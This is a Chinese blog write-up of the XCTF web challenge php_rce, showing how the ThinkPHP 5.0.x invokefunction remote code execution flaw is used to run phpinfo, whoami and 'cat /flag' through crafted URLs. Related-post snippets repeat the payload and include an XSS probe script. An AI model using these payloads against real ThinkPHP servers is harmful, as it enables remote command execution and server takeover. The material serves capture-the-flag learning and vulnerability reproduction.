攻防世界web练习15

最新推荐文章于 2025-05-30 14:31:16 发布
原创 最新推荐文章于 2025-05-30 14:31:16 发布 · 494 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #php #安全 #web安全

本文详细介绍了攻防世界web练习中的php_rce问题,涉及ThinkPHP5框架的一个远程代码执行漏洞。通过特定的URL输入,可以执行phpinfo及系统命令,如whoami,揭示了ThinkPHP5.0.20版本存在的getshell风险。利用此漏洞,可以尝试获取服务器flag。

攻防世界web练习

十五、php_rce

http://111.200.241.244:59735/
ThinkPHP远程代码执行

这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:
输入:http://your-ip:8080/index.php

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可执行phpinfo:

可以执行phpinfo,那可不可以执行其他命令呢?查了一下网上的payload,如下:

输入:http://your-ip:8080/index.php

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回看到:www-data www-data

【原理】

ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。

  1. http://111.200.241.244:59735/index.php
    ?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
    截图截图
    发现网页使用的是ThinkPHP框架,版本为5.0.20,此版本存在getshell漏洞(百度一下poc一抓一大把)

    1. 查找flag:http://111.200.241.244:59735/index.php
      ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
      截图
H_S2022
关注
Thinkphp5-5.0.22/5.1.29远程执行代码漏洞
hovcfuti的博客
10-13 625
ThinkPHP版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。升级方法请参考:https://blog.thinkphp.cn/869075。vulhub拉取靶场。写入webshell。
[漏洞复现]thinkphp5代码执行漏洞
Vicl1fe的博客
05-30 3155
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://paper.seebug.org/760/ 漏洞概述 漏洞利用
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 1603
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
ThinkPHP5RCE漏洞复现
飞雪 SecurityBlog
06-16 416
Payload:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
常见的框架漏洞
cheapkiller的博客
08-07 1416
然后进行远程代码执行?然后我们访问创建的php文件。在网页中输出phpinfo。然后进行远程命令执行代码。首先我们打开一个环境。
攻防世界题目练习——Web引导模式(四)(持续更新)
qq_48550824的博客
11-07 820
以及服务相应的版本…等等,从而可以找到相应的漏洞。不知道这个admin是uname输入框还是passwd输入框变过来的,盲猜应该是uname,重新试一下改了一下passwd,但是发现并没有返回302结果,返回的是200,并且没有像上一个一样的this_is_your_cookie的Set-Cookie的值,猜测可能是因为用户名密码不正确?的讲解,“能够对外发起网络请求的地方,就可能存在 SSRF”,我的理解为:凡是一个输入框可以用来访问其他网站的,就可能存在ssrf漏洞
攻防世界题目练习——Web引导模式(二)
qq_48550824的博客
10-12 1208
看源码可以知道,__wakeup()函数会强制将文件名转为index.php,因此我们需要绕过__wakeup()函数,接下来执行的__destruct()函数会输出对应文件的内容,我们需要让文件名显示为我们要查看的文件。的时候的结果,也就是说,这个网页在查询数据库时,应该是默认的查询的表名为"words",查询的列名为"id",所以我们把flag所在的表名改成words,列名改成id,就可以在网页查询1时获得flag。,1后面的单引号是多余的,因此触发报错,就可以判断我们输入的参数就是单引号闭合的形式。
攻防世界web练习区题目解答
weixin_46262057的博客
03-22 5018
xctf的web练习区题目解答。
攻防世界题目练习——Web引导模式(三)(持续更新)
qq_48550824的博客
10-16 1474
它能解析 .git/index 文件,并找到工程中所有的:文件名和文件 sha1,然后去 .git/objects/ 文件夹下下载对应的文件,通过 zlib 解压文件,按原始的目录结构写入源代码。下载完成后,因为看到前面的参考博客里是用的__init__.py文件来下载,于是在我下载的githacker-master的目录下的lib目录中找到了这个文件,按照那篇博客上的命令还是没法下载。/etc/passwd ,但是发现。在博客3讲的拼接不是很详细,没太懂这样构造之后在代码中是怎么拼接的,于是看了博客1.
攻防世界-WEB新手练习区教程(一)
tzyyyyyy的博客
11-07 841
攻防世界-WEB新手练习区教程 view_source get_post robots backup cookie disabled_button
php _get漏洞,thinkphp代码执行getshell的漏洞解决
weixin_42301367的博客
03-18 2587
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
ThinkPhP 5.0 远程代码执行复现
AKM4180的博客
04-24 443
ThinkPhP 5.0 远程代码执行复现 靶机: 192.168.249.129 攻击者: 192.168.0.130 一.靶机搭建环境 使用小皮集成环境(Apache 2.4.39+PHP 7.43) 1.1将think PHP下载包解压放入根目录; 下载地址:http://www.thinkphp.cn/donate/download/id/1156.html 1.2 访问靶机环境 :http://192.168.249.129/public/ 二 上Poc进行测试。 whoami查看用户
thinkphp5.*远程命令执行漏洞复现
weixin_42075643的博客
01-27 726
ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令] 用B
学习笔记-ThinkPHP5漏洞分析之代码执行(七)
人饭子的博客
11-09 1347
参考链接:Mochazz/ThinkPHP-Vuln/ 影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18 5.1.x : ?s=index/\think\Request/input&filter[]=system&data...
护网面经大全
最新发布
qq_62608648的博客
05-30 2372
事件描述:描述安全事件的基本情况影响分析:分析安全事件的影响范围和程度原因分析:分析安全事件的原因和漏洞处置过程:描述安全事件的处置过程和方法经验教训:总结安全事件的经验教训改进措施:提出改进措施和建议。
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,40道网络安全面试
m0_60721823的博客
04-06 1419
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
热门推荐
a1b2c3是弱口令
12-11 1万+
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 复现环境 ThinkPHP 5.0.20版本 环境启动后,访问http://192.168.1.15:8080即可看到ThinkPHP默认启动页面。 漏洞复现 payload: /index.php?s=inde...
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1805
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现
yougexiaojiuguan的博客
03-06 432
漏洞复现的记录
攻防世界web-web2
02-28
### Web安全攻防练习平台 对于希望深入理解和实践Web安全攻防技术的人来说,选择合适的在线实验环境至关重要。这类平台通常提供了一系列预配置好的虚拟机镜像以及各种类型的漏洞供学员尝试发现并加以修复。 #### 常见的Web安全攻防练习平台有: - **OWASP Juice Shop** OWASP Juice Shop 是一款现代的、基于浏览器的应用程序,旨在教授人们如何保护自己的网站免受常见的网络攻击。它包含了超过50种不同的注入点和弱点,覆盖了OWASP Top Ten中的所有类别[^2]。 - **DVWA (Damn Vulnerable Web Application)** DVWA是一个用于教育目的而设计得非常脆弱的PHP/MySQL Web应用程序。通过其简单易懂的操作界面,用户可以选择不同级别的难度来测试自己对SQL注入、XSS跨站脚本等多种常见漏洞的理解程度[^1]。 - **HackTheBox 和 TryHackMe** 这两个平台不仅限于Web应用层面的安全挑战,还包括操作系统层面上的任务。然而,在这些平台上也存在大量专注于Web渗透测试的房间或机器,非常适合那些想要提高实际动手能力的人士参与其中[^3]。 ```python import requests def test_web_vulnerability(url, payload): try: response = requests.get(f"{url}?input={payload}") if 'success' in response.text.lower(): print('可能存在漏洞') else: print('未检测到明显漏洞特征') except Exception as e: print(e) test_web_vulnerability("http://example.com/vulnerable_page", "<script>alert(1)</script>") ``` 此代码片段展示了如何编写简单的Python函数来进行基本的XSS探测。请注意这只是一个教学示例,在真实环境中应当遵循合法合规的方式进行安全性评估工作。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值